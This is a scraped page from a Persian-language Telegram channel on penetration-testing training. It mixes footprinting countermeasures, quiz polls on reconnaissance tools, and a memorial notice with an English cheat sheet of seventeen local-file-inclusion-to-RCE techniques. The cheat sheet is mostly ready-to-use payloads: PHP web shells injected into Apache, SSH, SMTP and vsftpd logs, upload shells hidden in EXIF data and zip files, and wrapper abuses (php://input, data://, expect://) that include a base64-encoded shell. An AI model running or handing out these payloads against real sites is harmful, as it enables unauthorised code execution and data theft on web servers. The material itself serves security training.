Try Hack Box – Telegram
Try Hack Box
5.81K subscribers
682 photos
65 videos
123 files
690 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
Footprinting Countermeasures

اقداماتی برای جلوگیری از Footprinting :


در زیر برخی از متداول ترین اقدامات متقابل برای محافظت از شما آورده شده است .

سازمان ها و کارکنان از malicious footprinting :

• آموزش کاربران را برای ایمن ماندن آنلاین ارائه دهید. در گذشته، بسیاری از شرکت ها کارمندان را از دسترسی به شبکه و سایت‌های شبکه‌های اجتماعی محدود می‌کند . با این حال، امروزه از سایت های شبکه های اجتماعی به عنوان بازاریابی استفاده می شود
ابزار و برای تجارت ضروری شده اند. به همین دلیل آموزش کاربران در
برخی موارد بهتر از مسدود کردن کامل سایت های شبکه های اجتماعی است.
• سرورهای وب را برای جلوگیری از نشت اطلاعات پیکربندی کنید.
• آموزش کارمندان برای استفاده از نام مستعار در وبلاگ ها، گروه ها و انجمن ها.
• از افشای اطلاعات مهم در بیانیه های مطبوعاتی، گزارش های سالانه، محصول خودداری کنید کاتالوگ و غیره
• به عنوان یک هکر اخلاقی، از تکنیک های ردپا برای کشف و حذف هر کدام استفاده کنید اطلاعات حساس در مورد شرکت و سیستم های شما که در دسترس عمومی است .
• به موتورهای جستجو اجازه ندهید که وب سایت های شما را در حافظه پنهان ذخیره کنند و از آنها به صورت ناشناس استفاده کنید خدمات ثبت نام.
• سیاست های امنیتی را برای تنظیم اطلاعاتی که کاربران شما می توانند فاش کنند، اعمال کنید به اشخاص ثالث

• DNS داخلی و خارجی جداگانه را پیکربندی کنید یا از تقسیم DNS و محدود کردن استفاده کنید
انتقال منطقه به سرورهای مجاز
• لیست دایرکتوری ها را در سرورهای وب غیرفعال کنید.
• به کاربران در مورد خطرات مهندسی اجتماعی آموزش دهید.
• برای استفاده از خدمات حفظ حریم خصوصی در پایگاه داده Whois Lookup مشترک شوید.
• از ایجاد ارتباط متقابل در سطح دامنه برای دارایی های حیاتی جلوگیری کنید.

#Footprinting
@TryHackBox
Network Forensics Privacy and Security

#network
#Forensics
T.me/Library_Sec
1. Apache Log Poisoning

GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
———————————————————
2. SSH Log Poisoning

ssh '<?php system($_GET['c'])?>'@target
.com

/show.php?file=/var/log/auth.log&c=ls
———————————————————
3. SMTP Log Poisoning

telnet target(.)com 25
MAIL FROM:<email@gmail.com>
RCPT TO:<?php system($_GET['c'])?>

/show.php?file=/var/log/mail.log&c=ls
———————————————————
4. Image Upload

i. Add this to EXIF data of s.png: <?php system($_GET['c'])?>
ii. Upload the s.png.
iii. /show.php?file=../img/s.png&c=ls
———————————————————
5. /proc/self/environ

GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>

If no success then try writing files.
———————————————————
6. php://filter

Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php

"php://filter" is case insensitive. Try URL/Double encoding
———————————————————
7. Zip upload

echo "<?php system($_GET['c'])?>" > shell.php
zip shell(.)zip shell.php
mv shell(.)zip shell.jpg
rm shell.php

/show.php?file=zip://shell.jpg%23shell.php
———————————————————
8. data://text/plain:

/show.php?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php"))?>
/show.php?file=data://text/plain,<?php phpinfo()?>
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=
———————————————————
9. /proc/self/fd/{id}

Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}
———————————————————
10. /proc/$PID/fd/$FD

i. Upload a lot of shells.
ii. /show.php?file=/proc/$PID/fd/$FD
———————————————————
11. expect://

/show.php?page=expect://ls
———————————————————
12. input://

POST /index.php?page=php://input HTTP/1.1

<?php system('ls')?>
———————————————————
13. RCE via vulnerable assert statement

Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");

Payload: ' and die(system("whoami")) or '
———————————————————
14. Log files:

/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log

Insert payload via headers (User-Agent, Authorisation, Referrer etc)
———————————————————
15. Via PHP sessions
https://t.co/X18JJhXhGU?amp=1
———————————————————
16. vsftpd Log Poisoning:

Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log
———————————————————
17. To automate, Use LFISuite.
——————————————————

@TryHackBox
Forwarded from Try Hack Box
Lpic1 همه بلدید ؟
Anonymous Poll
38%
بله
44%
خیر
18%
دارم یاد میگیرم
آلن پالر، موسس صنعت امنیت سایبری titan و موسسه SANS، درگذشت

آقای پالر در صنعت امنیت سایبری پیشگام بود و از نیاز به آموزش و دانش بیشتر برای پزشکان دفاع می کرد. ترکیبی از اشتیاق، عقل، و سختگیری اخلاقی او در آوردن افراد ماهرتر به این حرفه مؤثر بود. او SANS، یک سازمان حرفه‌ای آموزش امنیت سایبری را که هر ساله بیش از 40000 فن‌آور امنیت سایبری را آموزش می‌دهد، در سال 1989 تأسیس کرد.

ادامه شو میتونید از طریق لینک زیر مطالعه کنید :

https://www.prnewswire.com/news-releases/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away-301422382.html

Or

https://www.sans.org/press/announcements/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away/


@TryHackBox
🕊1
کدام یک از موارد زیر بهترین انتخاب برای Footprinting است
URL ها و اطلاعات سیستم عامل از یک هدف محدود شده است؟
Anonymous Quiz
42%
Netcraft
4%
Yesware
کدام یک از موارد زیر شامل مجموعه ای از پایگاه های داده در دسترس عموم است
که حاوی اطلاعات تماس ثبت نام دامنه هستند؟
Anonymous Quiz
15%
IETF
13%
IANA
72%
Whois
0%
OSRF
Try Hack Box
Photo
یک رکورد SOA جمع آوری شده از یک انتقال منطقه در اینجا نشان داده شده است (عکس بالا).
نام سرور DNS معتبر برای دامنه چیست و
سرورهای ثانویه هر چند وقت یک بار برای به روز رسانی بررسی می کنند؟
Anonymous Quiz
79%
DNSRV1.anycomp.com, هر 3600 ثانیه
7%
DNSRV1.anycomp.com, هر 600 ثانیه
3%
DNSRV1.anycomp.com, هر 4 ثانیه
10%
postmaster.anycomp.com, هر 600 ثانیه
یک همکار امنیتی در مورد یک حادثه اخیر گیج شده است. یک مهاجم با موفقیت به یک دستگاه در سازمان دسترسی پیدا کرد و با آن خارج شد
برخی از داده های حساس اسکن کامل آسیب پذیری بلافاصله اجرا شد پس از سرقت چیزی کشف نشد. کدام یک از آنچه که ممکن است اتفاق افتاده باشد را به بهترین نحو توصیف می کند؟

#Questions
از کدام ابزار یا تکنیک Footprinting می توان برای یافتن نام و آدرس کارمندان یا نقاط فنی تماس استفاده کرد ؟
Anonymous Quiz
68%
whois
7%
nslookup
12%
dig
12%
traceroute
کدام هک گوگل تمام صفحاتی را که کلمات SQL و Version را در عنوان خود دارند نمایش می دهد؟
Anonymous Quiz
29%
inurl:SQL inurl:version
15%
allinurl:SQL version
17%
innoscript:SQL inurl:version
39%
allinnoscript:SQL version
کدام برنامه OSRF بررسی می کند تا ببیند نام کاربری وجود داشته است یا خیر
در حداکثر 22 ارائه دهنده مختلف ایمیل ثبت نام کرده اید؟
Anonymous Quiz
20%
یک پنتستر در حال تلاش برای استفاده از nslookup است و ابزار را در حالت تعاملی برای جستجو دارد. برای درخواست رکوردهای مناسب از کدام دستور باید استفاده کرد؟
Anonymous Quiz
38%
request type=ns
7%
transfer type=ns
10%
locate type=ns
45%
set type=ns
آیا بحث Reconnaissance متوجه شدید؟

( از کامنت ها هم میتونید استفاده کنید )
Anonymous Poll
61%
بله
21%
خیر
18%
متوسط
سلام دوستان در کامنت بنویسید چه دوره هایی را گذروندید یا در حال گذراندن آن هستید میخوام بدونم پست ها رو در چه سطحی ببرم پس نظر بدید . با احترام مدیر کانال unique exploit